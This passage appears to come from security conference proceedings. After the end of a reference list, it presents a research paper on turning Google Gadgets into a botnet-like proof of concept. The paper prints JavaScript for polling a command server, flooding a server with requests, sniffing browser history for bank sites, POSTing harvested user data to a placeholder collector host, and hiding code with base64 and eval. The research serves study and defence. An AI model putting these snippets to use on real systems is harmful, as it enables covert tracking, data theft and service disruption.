http://www.ourpublicservice.org/OPS/publications/viewcontentdetails.php?id=135<br />

Calbreath, D. (2005) "MZM Scandal Illuminates Defense Contract Tactics," [online], Sign on San Diego,<br />

http://archives.signonsandiego.com/news/politics/cunningham/20050821-87-mzmscand.html<br />

Carney, J. (2010) “The War Against Wikileaks is Worse than Wikileaks,” [online], CNBC,<br />

http://www.cnbc.com/id/40551046/<br />

CBS News (2009) “Cyber War: Sabotaging the System” 60 Minutes,<br />

http://www.cbsnews.com/stories/2009/11/06/60minutes/main5555565_page1.shtml?tag=contentMain;conte<br />

ntBody<br />

Charney, S. (2009) “Reviewing the Federal Cybersecurity Mission,” Testimony Before the U.S. House Committee<br />

on Homeland Security Subcommittee on Emerging Threats, Cybersecurity, and Science and Technology,<br />

Washington, DC.<br />

Clockbackward (2009) “Does Beauty Equal Truth in Physics and Math?” [online], Clockbackward Essays,<br />

http://www.clockbackward.com/2009/03/11/does-beauty-equal-truth-in-physics-and-math/<br />

DoD 45th Annual Federal Forecast (2009) Department of Defense Special Topic Cyber Security: TechAmerica<br />

2009 Vision Conference, Washington, DC.<br />

Director of National Intelligence, “Vision 2015: A Globally Networked and Integrated Intelligence Enterprise,”<br />

[online], http://www.dni.gov/Vision_2015.pdf<br />

Espiner, T. (2010) “Chertoff Advances Cyber Cold War,” [online], ZDNet UK<br />

http://www.zdnet.co.uk/news/security-threats/2010/10/14/chertoff-advocates-cyber-cold-war-40090538/<br />

Gal-Or, E. and Ghose, A. (2004), “The Economic Consequences of Sharing Security Information,” Economics of<br />

Information Security, Vol. 12, pp. 95-104.<br />

GAO Report to Congressional Committees (2009) "Defense Acquisitions: Assessments of Selected Weapons<br />

Plans," [online], http://www.gao.gov/new.items/d09326sp.pdf<br />

Geer, D., Jr., Sc.D. (2010) “Cybersecurity and National Policy,” Harvard National Security Journal, Vol. 1.<br />

Giesler, R. (2009) personal conversation with the author.<br />

Gilbert, D. (2007) “If Only Gay Sex Caused Global Warming,” Huffington Post.<br />

Goldsmith, J. (2010) “Can We Stop the Global Cyber Arms Race?” Washington Post.<br />

Hathaway, M. (2009) “Strategic Advantage: Why America Should Care About Cybersecurity,” Harvard Kennedy<br />

School, Cambridge, MA.<br />

Hamilton, S.N., Miller, W.L., Ott, A., and Saydjari, O.S. (2002) The Role of Game Theory in Information Warfare,<br />

and Challenges in Applying Game Theory to the Domain of Information Warfare, Fourth Information<br />

Survivability Workshop ISW-2001/2002, Vancouver, BC Canada<br />

Winands, M.H.M. (2004) “Informed Search in Complex Games,” Datawyse b.v., Maastricht, The Netherlands.<br />

Jormakka, J. and Mölsä, J.V.E. (2005) “Modeling Information Warfare as a Game,” Journal of Information Warfare<br />

Vol. 4, No. 2, pp. 12-25.<br />

Kahneman, D. and Renshon, J. (2006) “Why Hawks Win.” Foreign Policy.<br />

http://www.foreignpolicy.com/articles/2006/12/27/why_hawks_win<br />

Libicki, M. (1995) What is Information Warfare? National Defense University, Washington, DC.<br />

McCormick, G. H. and Owen, G. (2006) "A Game Model of Counterproliferation, with Multiple Entrants,"<br />

International Game Theory Review, Vol. 8, No. 3, pp. 339-353.<br />

Moscaritolo, A. (2009) “Industry Collaboration: Drumming Up Defenses,” SC Magazine.<br />

MSNBC (2007) “Defense Dept. warns about Canadian spy coins,” [online],<br />

http://www.msnbc.msn.com/id/16572783/<br />

National Research Council Committee on Offensive Information Warfare (2009) “Technology, Policy, Law and<br />

Ethics Regarding U.S. Acquisition and Use of Cyberattack Capabilities,” The National Academies Press,<br />

Washington, DC.<br />

http://www.abanet.org/natsecurity/cybersecurity_readings/1final_report_cyberattack_nasnae.pdf<br />

Prince, B. (2010) “Microsoft: U.S. Home to Most Botnet PCs,” eWeek [online]<br />

http://www.eweek.com/c/a/Security/Microsoft-US-Home-to-Most-Botnet-PCs-216614/<br />

Project Honey Pot, (2009) “Our 1 Billionth Spam Message” [online]<br />

http://www.projecthoneypot.org/1_billionth_spam_message_stats.php<br />

Report of the Defense Science Board (2010), “Capability Surprise,” [online],<br />

http://www.acq.osd.mil/dsb/reports/ADA506396.pdf<br />

Rescorla, E. (2004) “Is Finding Security Holes a Good Idea?” Third Workshop on the Economics of Information<br />

Security, Minneapolis, MN.<br />

Reuters (2010) “Wikileaks Battle: A New Amateur Face of Cyber War?” CNBC<br />

Rohde, Klaus (2005) Nonequilibrium Ecology. Cambridge University Press, Cambridge, UK.<br />

-- [online] “Games Theory (Nash Equilibria) in International Conflicts,” http://knol.google.com/k/games-theorynash-equilibria-in-international-conflicts#<br />

Saydjari, O.S. (2004) “Cyber Defense: Art to Science,” Communications of the ACM Vol. 47, No. 3 pp. 52-57.<br />

Schavland, J., Chan, Y., and Raines, R.A. (2009), “Information Security: Designing a Stochastic-Network for<br />

Throughput and Reliability.” Naval Research Logistics Vol. 56, No. 7, pp. 625-641.<br />

Shapcott, Brad “Economics Proverbs,” [online], CEO Magazine<br />

http://ceomagazine.biz/hrmproverbs/economicsproverbs.htm<br />

Shen, D., Chen, G., Haynes, L.S., Cruz, J.B., Kruger, M. and Blasch, E. (2007) “A Markov Game Approach to<br />

Cyber Security,” [online], SPIE Newsroom, https://spie.org/x15400.xml?ArticleID=x15400<br />

Schofield, J. (2008) “It's Every Man for Himself,” The Guardian.<br />

Sills, M. (2009) “ULL gets Air Force contract: Researchers to develop preemptive cyber security strategies,” The<br />

Advocate [online] http://www.2theadvocate.com/news/79589152.html?c=1287843989513<br />

Soares, M. (2009) “Brazilian Blackout Traced to Sooty Insulators, Not Hackers,” Wired Magazine.<br />

Spring, B. “Nuclear Games: A Tool for Examining Nuclear Stability in a Proliferated Setting,” [online],<br />

http://www.heritage.org/Research/nationalSecurity/upload/hl_1066.pdf<br />

Umehara, E. and Ohta, T. (2009) “Using Game Theory to Investigate Risk Information Disclosure by Government<br />

Agencies and Satisfying the Public—the Role of the Guardian Agent," Systems, Man and Cybernetics, Part<br />

A: IEEE Transactions on Systems and Humans Vol. 39, No. 2, pp. 321-330.<br />

Verizon 2009 Data Breach Investigations Report, [online], Verizon Business Security Solutions,<br />

http://securityblog.verizonbusiness.com/2009/04/15/2009-dbir/<br />

Verizon 2010 Data Breach Investigations Report, [online], Verizon Business Security Solutions,<br />

http://www.verizonbusiness.com/resources/reports/rp_2010-data-breach-report_en_xg.pdf<br />

Wilson, C. (2008) “Botnets, Cybercrime, and Cyberterrorism: Vulnerabilities and Policy Issues for Congress”<br />

Congressional Research Service Order Code RL32114, Washington, DC.<br />

Woodward, P. (2010) “Stuxnet: the Trinity Test of Cyberwarfare,” War in Context [online]<br />

http://warincontext.org/2010/09/23/stuxnet-the-trinity-test-of-cyberwarfare/<br />

Zittrain, J., Lord, Lt. Gen. W., Geer, D., (2010) Cybercrime and Cyberwarfare class, Harvard Law School.<br />

Zittrain, J. (2008) The Future of the Internet—and How to Stop It. Yale University Press, New Haven, CT.<br />

-- (2009) “The Web as Random Acts of Kindness” [online video]<br />

http://www.ted.com/talks/jonathan_zittrain_the_web_is_a_random_act_of_kindness.html<br />


Who Needs a Botnet if you Have Google?<br />

Ivan Burke and Renier van Heerden<br />

Council for Scientific and Industrial Research, Pretoria South Africa<br />

IBurke@csir.co.za<br />

RvHeerden@csir.co.za<br />

Abstract: Botnets have become a growing threat to networked operations in recent years. They disrupt services<br />

and communications of vital systems. This paper gives an overview of the basic anatomy of a Botnet and its<br />

modus operandi, and presents a Proof of Concept of how Google gadgets may be exploited to<br />

achieve the basic components of a Botnet. We do not provide a full-fledged Botnet implementation but merely<br />

mimic its functionality through the Google Gadget API. Our goal was to have Google act as a proxy agent to mask<br />

our attack sources, establish a Command and Control structure between Bots and Botherders, launch attacks, and<br />

gather information, while at the same time maintaining some degree of stealth so as not to be detected by users.<br />

Keywords: Botnet; Google Gadget; Command and Control; DDoS<br />

1. Introduction<br />

A Botnet is a collection of compromised computers or agents that are infected by malware. These<br />

agents use sophisticated command and control techniques to execute complex and distributed<br />

network attacks. Agents are usually unaware that they have been compromised and are partaking in<br />

these attacks. They are often controlled by external agents known as Botherders or master agents<br />
(Banks 2007, Vamosi 2008).<br />

According to Stewart (in Vamosi, 2008), the techniques used by large Botnets such as Storm are<br />

available online, but a Botnet is more than the sum of its parts. What makes a Botnet successful is<br />

combining all these components into a coherent structure.<br />

Stracener (2008) states that future malware will run on the internet instead of<br />
standalone computers. His premise is that, as the modern computer infrastructure moves closer to a<br />
networked cluster or cloud, so too will the threats to these infrastructures. He warns<br />
about malicious gadgets and key vulnerabilities related to gadgets. A study conducted by WorkLight<br />
Inc. (in MacManus, 2008) found that 48% of internet banking users, ages 18-34, would use secure<br />
third-party Web 2.0 gadgets for their personal banking if their banks did not provide them with such<br />
functionality. This would imply that users are able to make an informed decision about what it<br />
means to identify a Web 2.0 gadget as being secure.<br />

Stracener’s concerns are echoed by the Cloud Security Alliance in their paper (Hubbard et al.,<br />

2010). They identify seven key threats to Cloud computing security:<br />

Abuse and nefarious use of cloud computing<br />

Insecure interfaces and APIs<br />

Malicious insiders<br />

Shared technology issues<br />

Data loss or leakage<br />

Account or service hijacking<br />

Unknown risk profile<br />

In this paper we demonstrate a rudimentary Botnet construct by exploiting Google services to host our<br />

Botnet. We investigate the core components of a Botnet and then attempt to mimic the components<br />

using Google Gadget API. It is not the goal of this paper to illustrate the weaknesses in a specific API<br />

but rather to illustrate the danger of user-generated content on the World Wide Web. Our aim is to<br />
prove that online services can be organized into a botnet-like structure.<br />

The Google Gadgets API is designed for rapid development of small web-based utility applications such as<br />
calendars, currency converters and news feed readers (Peterson, 2009). By adding the OpenSocial<br />
API to a Google gadget, one can enhance shared gadget interaction and extend one’s gadget to the<br />
Social Media domain.<br />




Flaws in Google Gadgets have been demonstrated by Barth et al. (2009). They noted that JavaScript<br />
can lead to exploitation. These vulnerabilities range from session-sharing vulnerabilities, which enable<br />
Cross-Site Scripting (XSS), to malicious redirects and Man-in-the-middle attacks. Google has been<br />
reluctant to fix some of these vulnerabilities since 2004 (Robert, 2008).<br />

In Section 2, we investigate the composition of a basic Botnet. In Section 3, we describe our attempt<br />

at mimicking these components. In Section 4, we discuss our Botnet model. In Section 5, we propose<br />

possible future applications of this work. In Section 6, we present our conclusions and possible means<br />

of stopping these types of Botnets.<br />

2. Anatomy of a botnet<br />

Botnets tend to share commonalities in their structure and design. In this Section, we describe the<br />

common components of a Botnet as well as their role within the Botnet.<br />

Figure 1: Anatomy of a Botnet<br />

2.1 Command and control component<br />

A large part of a Botnet’s success can be attributed to its ability to execute large, synchronized,<br />

distributed attacks. This would require sophisticated command and control (C2) structures to coordinate<br />

these attacks (Banks 2007, Ollmann, 2009).<br />

Communication channels usually relay herder instructions, such as commands to execute on a remote<br />
PC. Bots use channels to send back retrieved data such as key logger information or command<br />
response information. These communications need to be covert in order to hide the Botnet activities.<br />
<br />
Over the years several covert channels have been used to communicate commands between Bot and<br />
Botherder, such as Twitter, Internet Relay Chat (IRC) and Instant Messages. Several advanced C2<br />
techniques, such as steganography or the use of social media sites, hide Botnet communication in plain sight.<br />
Next we look at the types of attacks that could be executed by Botnets (Ollmann, 2009).<br />



2.2 Attack vector<br />


Botnets are usually goal-oriented. For the most part their goal is either profit or service disruption.<br />

There are several means of achieving these goals using botnets. In this Section, we discuss some<br />

attacks commonly used by Botnets.<br />

2.2.1 Distributed denial of service attack<br />

Due to Botnet size and the distributed nature of Botnets, Distributed Denial of Service attacks (DDoS)<br />

are a popular form of attack (Felix et al., 2005). In this attack the Botherder issues a command to all<br />
its subordinate Bots to connect to a targeted system at the same time. The targeted system<br />
usually cannot handle the sudden influx of requests, which causes system services to be temporarily<br />
disrupted. Botherders rent out this capability to competitors to disrupt competitor services (Kiefer,<br />
2004).<br />

2.2.2 Spam relay<br />

The first generation of Botnets were reliant on email to spread and infect various hosts. Botnets<br />
would open a SOCKS v4/v5 proxy on compromised machines, allowing them to send spam at the request<br />
of the Botherder. Botnets also harvested email addresses from infected hosts to add to their spam lists<br />
(Engate, 2009).<br />

2.2.3 Data harvesting<br />

Botnets report valuable system information back to Botherders. This information can include<br />
keystroke logs, system vulnerabilities, service availability on the host machine, open port data and network<br />
traffic. Botherders collect and collate this data to retrieve items such as user names and passwords<br />
which could be used for mass identity theft. Botnets scan for system weaknesses that could be<br />
exploited at a later stage if current Botnet functionality is compromised. By sniffing network traffic,<br />
Botnets can become aware of rival Botnets infecting the host PC and disrupt those rival Botnets’<br />
functionality.<br />

2.2.4 Ad serve abuse<br />

Botnets can be utilized for monetary gain. Botnets can be used to exploit the Pay Per Click or<br />

Impression Based internet advertising models. By forcing infected machines onto ad-serving sites or<br />
using iFrames to fool users into clicking on advertisements, Botherders can generate revenue from<br />
marketing companies.<br />
<br />
Botherders infect host PCs with browser add-ons, Browser Helper Objects (BHO), or browser<br />
extensions which change the user’s browser interaction to redirect them to ad-serving sites, or simply generate<br />
browser requests to ad-serving sites automatically. These add-ons can serve a dual purpose, as they can<br />
collect user data from the browser and relay it to the Botherder.<br />

2.3 Viral capability<br />

One of the great strengths of a Botnet is its sheer size. This also makes Botnets so tough to take<br />

down. Hence it is essential for a Botnet to spread quickly across vastly distributed systems.<br />

The first generation of Botnets were primarily reliant on email and malicious page redirects to<br />
spread. Modern Botnets such as Asprox, Koobface, Zhelatin and Kreios C2 spread via social media<br />
(Denis, 2008; Eston, 2010). The Botnet posts content as users on social network sites, which infects any<br />
user that follows the malicious links. Some Botnets have been known to hide within popular trusted<br />
applications. Trojans drop malicious code in trusted address spaces and exploit weaknesses in the<br />
host PC to compromise it and make it part of the Botnet network.<br />

2.4 Stealth component<br />

Botnets are only useful as long as they are not detected. Hence stealth is a fundamental requirement<br />

for all Botnets.<br />

It is the opinion of the researchers that stealth is required in each of the components previously<br />
identified in this section. If communications are noisy, infected hosts might become aware of malicious<br />
activity, and firewalls or intrusion detection systems might block communications. If an attack is disruptive,<br />
anti-virus companies will detect and block the attack. Mechanisms used to spread Botnets must seem<br />
organic and natural to be effective. It is the combination of these requirements that makes Botnets<br />
so difficult to construct and maintain.<br />

In the next section we describe our attempt at constructing these components using the Google Gadgets API.<br />

3. Attempt at constructing a botnet<br />

In this Section, we will discuss our attempt to create a proof of concept Botnet. First we look at<br />
cloud computing as a whole; then, more specifically using the Google Gadgets API, we investigate the<br />
possibility of using Cloud computing to mimic the attack components of a Botnet, as presented in<br />
Section 2. It is important to note that this paper is not specifically targeted at exposing<br />
Google API weaknesses, but rather at illustrating the dangers of user-generated content and cloud computing<br />
on the World Wide Web.<br />

According to Gartner (2008), cloud computing can be defined as a style of computing whereby<br />
IT-related capabilities are provided as a service using Internet technologies to connect to multiple<br />
customers. Botnets have already been found using popular cloud platforms such as Amazon's EC2 as a<br />
Command and Control unit (Goodin, 2009). In a report compiled by the Cloud Security Alliance,<br />
seven types of security threats were identified (Hubbard et al., 2010). Of these seven, we focused on<br />
two main attack vectors: abuse and nefarious use of cloud computing, and insecure interfaces<br />
and APIs.<br />

3.1 Establishing denial of service attack capability<br />

Figure 2: Google Gadget makeRequest() function<br />

The Google Gadgets API provides users with the capability to load remote content into gadgets by calling<br />
makeRequest() (Google Gadgets API, 2009). This function is asynchronous and can be called<br />

independent from other JavaScript calls. This is a fairly useful capability as this allows users to easily<br />

create gadget versions of their websites and extend their market reach. This function instructs one of<br />

the servers residing on the Google Gadget Domain to perform an HTTP request on behalf of the<br />

gadget user, as illustrated in Figure 3. This implies that the request<br />
source is obfuscated and that only the Google Gadget Server IP address will appear in the remote<br />
server logs. By exploiting this communication structure one can use Google Gadget Servers as Bots<br />
for a Botnet. For the purpose of this Proof of Concept we used Google’s makeRequest() function to<br />
send and interpret all command and control messages sent between Bots and Botherder.<br />

Figure 3: makeRequest() HTTP request flow<br />
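A gadget built around this channel can be sketched as follows. This is a minimal, hypothetical spec fragment, not our actual Proof of Concept code: the title and the command URL are placeholders, and the legacy gadgets.io.makeRequest() call shape is assumed from the Gadgets API documentation.<br />
<br />
```xml
<?xml version="1.0" encoding="UTF-8"?>
<Module>
  <!-- The gadget masquerades as a harmless utility. -->
  <ModulePrefs title="Innocuous Clock" />
  <Content type="html"><![CDATA[
    <script type="text/javascript">
      // Hypothetical Botherder-controlled URL polled for instructions.
      var C2_URL = "http://example.org/commands.txt";
      function pollForCommands() {
        // Google's servers fetch the URL on the gadget's behalf, so only
        // Google IP addresses appear in the C2 server's access logs.
        gadgets.io.makeRequest(C2_URL, function (response) {
          // response.text would carry the herder's instruction,
          // e.g. a target URL for the next attack.
        }, {});
      }
      pollForCommands();
    </script>
  ]]></Content>
</Module>
```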

According to Google Webmaster Central (2010), Google uses a Feedfetcher user-agent to retrieve<br />

remote content. Google’s Feedfetcher user-agent does not follow the Robots Exclusion Protocol. This<br />

protocol is not mandatory but is meant to protect certain pages from being viewed by web spiders and<br />

crawlers. When asked why Google’s Feedfetcher agent does not obey robots.txt, the Google<br />
representative stated that the Feedfetcher request is the result of an explicit action by a human user,<br />
and not from automatic crawlers; hence Feedfetcher does not follow robots.txt guidelines. This<br />

response would imply it is not possible to generate fetch requests automatically, yet seeing as Google<br />

gadgets are coded in JavaScript it is a trivial task to automate the fetch requests.<br />




According to (Google Gadgets API, 2009), Google’s makeRequest() function does not validate the<br />

existence of a page prior to sending the HTTP request to remote server. This would mean malicious<br />

coders can use Google Gadgets to probe websites for config, admin or script files stored in un-listable<br />

directories of web pages. This could also be used to create a large amount of traffic towards the web<br />

server by generating makeRequest() calls for non-existent pages on the server. This type of probing<br />

and traffic generation could also be created by pure JavaScript without the use of Google Gadget’s<br />

makeRequest() function, but the benefit of using Google Gadget API is that the remote server logs will<br />

only contain the IP address of Google Gadget application servers, as illustrated in Figure 4.<br />

Figure 4: Remote server log<br />

Google provides a cache feature for all its gadgets to reduce server loads (Google Gadgets API,<br />
2009). This cache server saves a copy of the remote content on a local server for faster retrieval. By<br />
default, Google gadgets are cached for approximately one hour. Because some gadget developers<br />
need shorter cache timing due to the dynamic nature of their gadgets, Google provides<br />
developers with the capability to set the cache interval themselves. According to Google Gadgets API<br />
(2009), it is possible to set the interval to zero seconds. The Google Gadgets API does not prevent<br />
developers from setting the cache interval to zero, but warns that doing so might overload the<br />
remote server.<br />

Thus we have discovered two means of disrupting a remote server: either by generating requests for a<br />
near-infinite number of fictitious web pages on the server, or by fetching the same page repeatedly with<br />
the refresh interval set to zero seconds.<br />
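The first technique can be sketched in a few lines. This is a standalone sketch, not our Proof of Concept code: the target host is a placeholder, and sendRequest stands in for gadgets.io.makeRequest(), which only exists inside the gadget container.

```javascript
// Sketch of the "fictitious pages" flooding technique.
function randomPageUrl(host) {
  // Random path that almost certainly does not exist on the server; the
  // server still spends cycles resolving and rejecting every request.
  var name = Math.random().toString(36).substring(2, 12);
  return "http://" + host + "/" + name + ".html";
}

function flood(host, count, sendRequest) {
  // In a gadget, sendRequest would be gadgets.io.makeRequest with the
  // refresh interval set to zero so no request is served from cache.
  for (var i = 0; i < count; i++) {
    sendRequest(randomPageUrl(host));
  }
}

// Example with a recording stub instead of a real request function:
var issued = [];
flood("target.example.org", 5, function (url) { issued.push(url); });
```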

3.2 Retrieving user data<br />

Clients using the Cloud use API calls to communicate with and execute commands on the Cloud,<br />
through its Service-Oriented Architecture (SOA). In general, cloud computing units are heavily<br />
compartmentalized to ensure no data can be leaked between clients. Unfortunately, the components<br />
that make up the Cloud infrastructure, such as CPU, RAM and GPU, were not specifically designed<br />
for isolation (Hubbard et al., 2010). Techniques to exploit this weakness have been demonstrated by<br />
Joanna Rutkowska (Rutkowska, 2008) and Kostya Kortchinsky (Kortchinsky, 2009). In our specific<br />
case we do not target data on the Cloud; we merely use the Cloud as a channel to pass<br />
and receive messages.<br />

The Google Gadgets API is a collection of JavaScript libraries; as such, gadgets require JavaScript to be<br />
enabled to utilize its capabilities. JavaScript can be used to determine user browser history and browser<br />
information. Cabri (2007) created a simple JavaScript function to determine whether a page has been<br />
visited before. Figure 5 contains the script he used. By using this script to look up<br />
banking sites or social media sites, one can determine which banking and social media services the<br />
user has visited.<br />
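The scanning logic behind this technique can be restated as follows. This is our own simplification, not Cabri's script (which is shown in Figure 5): in a browser of that era, isVisited would create an `<a href="...">` element and compare its computed colour against the page's :visited style, a trick that modern browsers have since mitigated. Here the check is injected so the loop stands on its own, and the target list is hypothetical.

```javascript
// Sketch of a history probe over a pre-built list of interesting URLs.
// We can only ask "was this exact URL visited?", so the scan is exhaustive.
var TARGET_SITES = [
  "http://www.bank-one.example.com",
  "http://www.bank-two.example.com",
  "http://www.socialsite.example.com"
];

function probeHistory(targets, isVisited) {
  // Returns the subset of targets the user's browser history contains.
  return targets.filter(isVisited);
}

// Example with a stubbed history check:
var visited = probeHistory(TARGET_SITES, function (url) {
  return url.indexOf("bank-one") !== -1;
});
```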

By combining this script with Google gadget makeRequest(), one can determine if the user has auto<br />

login enabled for certain social media sites. For example: to test if the user has auto-logon enabled on<br />

Facebook one can request http://www.facebook.com/home.php. If the content is the home page it<br />

would mean the browser automatically logged the user in or the user has an active Facebook session.<br />

If the login page is returned it would mean the user’s session has expired or that auto-logon is<br />

disabled. Keep in mind that makeRequest() does not display the page, it merely returns its contents to<br />

the callback function specified by the makeRequest() call. This means that the user does not get<br />
any visual cues of gadget activity. The Botnet designer can choose whether to scrape the<br />
resulting home page for more data, crawl the social network site for more data, or simply report the<br />
information back to the Botherder for future use.<br />




Figure 5: Sites visited script<br />

Hashemian (2005) created a PHP script that can be accessed via JavaScript to perform IP resolution<br />
and reverse DNS lookups for visitors to sites. This provides more information on the location and domain<br />
usage of the gadget user. Google’s makeRequest() function is also capable of performing a POST<br />
request. By combining these JavaScript information-gathering techniques with the posting capability of<br />
Google’s makeRequest(), one can report gathered information back to the Botherder. This is just some of<br />
the data that can be gathered using JavaScript and by no means covers all the data that can be<br />
harvested, but for the purposes of this Proof of Concept it is sufficient.<br />
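The reporting step can be sketched as below. The collection URL and the harvested fields are hypothetical, and the parameter names (RequestParameters.METHOD, MethodType.POST, POST_DATA, encodeValues) are taken from the Gadgets API documentation; a minimal stub of gadgets.io is included so the snippet runs outside the gadget container, where the real object would be supplied by the runtime.

```javascript
// Stub of the gadgets.io API, recording calls instead of performing them.
var gadgets = { io: {
  RequestParameters: { METHOD: "METHOD", POST_DATA: "POST_DATA" },
  MethodType: { POST: "POST" },
  encodeValues: function (fields) {
    // URL-encode a flat key/value object into a POST body.
    return Object.keys(fields).map(function (k) {
      return encodeURIComponent(k) + "=" + encodeURIComponent(fields[k]);
    }).join("&");
  },
  makeRequest: function (url, callback, params) {
    gadgets.io.lastRequest = { url: url, params: params };
    callback({ text: "ok" });
  }
}};

// POST harvested data back to the Botherder's (hypothetical) collector.
function reportHome(data) {
  var params = {};
  params[gadgets.io.RequestParameters.METHOD] = gadgets.io.MethodType.POST;
  params[gadgets.io.RequestParameters.POST_DATA] = gadgets.io.encodeValues(data);
  gadgets.io.makeRequest("http://collector.example.org/drop.php",
                         function () {}, params);
}

reportHome({ ip: "198.51.100.7", bank: "bank-one" });
```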

3.3 Adsense abuse<br />

Advertising companies offer website designers money for serving up adverts on their sites. By<br />
requesting pages using makeRequest(), one can fool most Impression Based advertising models into<br />
counting the page fetch as an impression, hence generating revenue for the website designer. Unique<br />
IP addresses carry a higher weight with advanced Impression Based advertising sites. Because<br />
Google Gadget application servers make the request, only a select few IP addresses will in effect be<br />
displayed in advertising company logs. Hence, AdSense abuse is not really effective with the Google<br />
Gadgets API, but it does guarantee a steady and constant number of visits to a site.<br />

3.4 Obfuscating source of attack<br />

Thus far it has already been stated that if the Google Feedfetcher is used to fetch remote data only<br />

the Google Gadget Domain Server's IP will be logged in the remote servers access logs. This is<br />

already an attempt to obfuscate the source of the attack. Unfortunately for Google gadgets to work<br />

and to be published Google needs to be able to access the gadget source code. This means that<br />

anyone wishing to add the gadget would also be able to fetch the source code and could possibly<br />

deduce that it executes malicious commands. A simple way of overcoming this obstacle is to obfuscate<br />
the source code, for example by encoding the JavaScript source code in base64. Wang (2009) developed<br />
a web tool specifically designed to obfuscate JavaScript. Figure 6 illustrates the result of obfuscating the<br />
hasLinkBeenVisited() function.<br />



Figure 6: JavaScript obfuscation<br />
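The base64 round trip itself is trivial. The sketch below uses Node's Buffer for the encoding (a browser gadget would use btoa()/atob() instead), and the payload is a harmless stand-in, not the gadget's real logic; Wang's tool shown in Figure 6 applies heavier transformations than plain base64.

```javascript
// Stand-in for the gadget's real logic.
var payload = 'function hasLinkBeenVisited(url) { return false; }';

// What ships in the published gadget source: an opaque base64 string.
var obfuscated = Buffer.from(payload, 'utf8').toString('base64');

// What the gadget does at runtime: decode, then eval the original code.
var decoded = Buffer.from(obfuscated, 'base64').toString('utf8');
eval(decoded); // defines hasLinkBeenVisited()
```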

3.5 Spreading of botnet<br />


Thus far we have illustrated two layers of attack. The DDoS attacks and AdSense abuse described in<br />
the previous subsections are targeted towards remote servers or Impression Based advertising<br />
companies; these attacks are in effect performed by the gadget users on behalf of the Botherder. The<br />
second layer of attack is the data gathering performed on the actual gadget user.<br />

Attacks on remote servers actually require few gadget users: a Botherder can automate mass<br />
amounts of requests from a single gadget user. FeedFetcher was designed to be distributed across<br />
several machines to improve performance, and to cut down on bandwidth Google attempts to make the<br />
fetch request from a machine situated near the target remote site. This means that the IP address<br />
constantly changes and that the physical location of the fetching machines also varies.<br />

The second layer of attack is more reliant on the gadget itself to spread among users. For the<br />

purpose of this research we merely created several Google accounts and used Google Gadget<br />

sharing capabilities to distribute the gadgets. We will now briefly discuss some of the options available<br />

for spreading gadgets.<br />

Google Gadget API provides users with the capability of sharing gadgets among a user’s Google<br />

contact list or by sending out emails containing an invite to install the gadget. Google also provides the<br />

capability of publishing the gadget on their Application servers. Published applications can be ranked<br />

and browsed by all iGoogle users. By manipulating the Google ranking system one can increase the<br />

probability of a gadget being added by other users.<br />

Google Gadget API is fully integrated with OpenSocial API. OpenSocial API is a web framework for<br />

developing social applications which are capable of communicating across multiple social media sites.<br />

Peterson (2009) provides some basic steps that can be taken to increase gadget spread.<br />

In the next Section, we will discuss our final Botnet model. We discuss how we mapped all the<br />

techniques described in this Section into our final Proof of Concept model.<br />

4. Botnet gadget<br />

Figure 7 illustrates the basic structure of our Botnet gadget. The Botherder acts as a<br />
Gadget developer and uses Google’s services to update the Gadget and, by extension, the<br />
Botnet. By doing this the Botherder has a single point of access to all Bots at the same time.<br />
Updates might include new JavaScript attacks or even new targets for a DDoS attack. The Botnet hides<br />
in plain sight as a normal gadget. It can use either a command from the Botherder or a temporal<br />
event to trigger a remote attack, and while the Botnet is waiting to commence the next attack the<br />
Gadget can gather information on Gadget users and possibly identify other means of<br />
communication or vulnerabilities on the Gadget user’s PC.<br />




Figure 7: Botnet Gadget<br />

In the remainder of this Section we discuss the attacks we added to our PoC Botnet Gadget and we<br />

discuss some of the information obtained by our Botnet Gadget.<br />

We used the JavaScript function provided by Cabri (2007) to extract user history information, such as<br />
which social network sites the gadget user has visited and which bank he or she uses. Cabri’s (2007)<br />
script can only determine whether a specific site has been visited, making this an exhaustive search;<br />
we therefore scanned through a targeted list of URLs for information we were interested in. We used the<br />
JSON IP address recovery script provided by Bullock (2010) to determine the gadget user’s IP, time zone<br />
and general geographical location using the retrieved IP.<br />

Figure 8: Sample of JSON IP recovery script<br />

To determine if the gadget user has auto-login enabled for social network sites, we created hidden iFrames<br />
to try to access logged-in content of social media sites. We queried the iFrame content to determine<br />
whether the iFrame was redirected to the login page or whether it could access the content. This data<br />

along with IP and history data was posted back to our own remote server using Google’s<br />

makeRequest() function.<br />
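The classification step can be sketched as a simple content check. The heuristic and the sample markup below are our own simplification (a login page carries a password field, a logged-in page does not); a real gadget would apply this to the fetched iFrame or makeRequest() content.

```javascript
// Sketch: classify fetched page content as "logged in" vs "login form".
function looksLoggedIn(html) {
  // A page that asks for a password is, by this heuristic, a login page.
  return !/type\s*=\s*["']?password/i.test(html);
}

// Stand-in responses for the two cases:
var loginPage = '<form><input type="password" name="pass"></form>';
var homePage  = '<div id="stream">Welcome back!</div>';
```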

For a denial of service attack we used one of our own servers and requested fictitious pages from it<br />

using the makeRequest() function. We placed the fetch request in an endless loop that generated<br />
randomized page requests to our server. This approach was not successful, as it caused the gadget user’s<br />

PC to run out of memory. Upon investigation we realized this was caused by Google’s AdSense<br />

triggering upon each remote request. We realized that by slowing the request rate one could<br />

effectively use this technique for AdSense abuse but as this was not our goal with this PoC we<br />

deactivated AdSense tracking.<br />

We ran the DDoS attack ten times on our own server. We used a single Google Gadget machine.<br />

Table 1 shows that on average 638 requests were executed per second. According to<br />

server logs, eight unique Google domain servers were used to make the remote requests. Based on<br />

this data and data pertaining to a specific target server one can determine the number of Gadget<br />

users required to effectively take down a remote server. Unfortunately there is no fixed number of<br />

Gadget users that is required to disrupt a service. The number required is dependent on server<br />

architecture, request routing and data transferred per request. This PoC just determined the rough<br />

number of requests that are possible using Google gadgets.<br />

Table 1: DDoS results<br />

Experiment Time per 1000 requests (s) Requests per second<br />

1 1.376 726.744<br />

2 1.884 530.786<br />

3 1.232 811.688<br />

4 1.473 678.887<br />

5 1.661 602.047<br />

6 1.573 635.768<br />

7 1.589 629.406<br />

8 1.605 623.169<br />

9 1.621 617.055<br />

10 1.637 611.060<br />

Average 1.56495 638.998<br />
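The two columns are directly related: the rate is 1000 requests divided by the measured time, and the quoted average rate corresponds to 1000 over the average time (rather than the mean of the per-run rates). The quick check below recomputes both from the table's time column; it agrees with the published averages to within rounding.

```javascript
// Time (in seconds) per 1000 requests for the ten experiments in Table 1.
var times = [1.376, 1.884, 1.232, 1.473, 1.661, 1.573, 1.589, 1.605, 1.621, 1.637];

// Average time, and the derived average rate = 1000 / average time.
var avgTime = times.reduce(function (a, b) { return a + b; }, 0) / times.length;
var avgRate = 1000 / avgTime;
```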

